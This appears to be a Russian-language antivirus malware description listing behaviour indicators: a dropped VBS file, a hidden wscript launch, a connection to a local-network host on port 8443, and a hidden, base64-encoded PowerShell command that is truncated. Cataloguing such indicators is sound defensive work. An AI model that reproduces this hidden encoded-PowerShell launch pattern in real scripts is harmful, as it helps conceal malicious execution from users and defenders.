Техническая информация
- %TEMP%\aec5.tmp\aec6.vbs
- %TEMP%\aec5.tmp\aec6.vbs
- '<LOCALNET>.1.66':8443
- '<SYSTEM32>\wscript.exe' %TEMP%\AEC5.tmp\AEC6.vbs
- '<SYSTEM32>\wscript.exe' %TEMP%\AEC5.tmp\AEC6.vbs' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBlAHIAUwBpAE8AbgBUAGEAQgBMAGUALgBQAFMAVgBlAFIAcwBpAG8ATgAuAE0AYQBKAG8AUgAgAC0ARwBlACAAMwApAHsAJABHAFAAUwA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBCAGwAeQAuAEcAZQBU...' (со скрытым окном)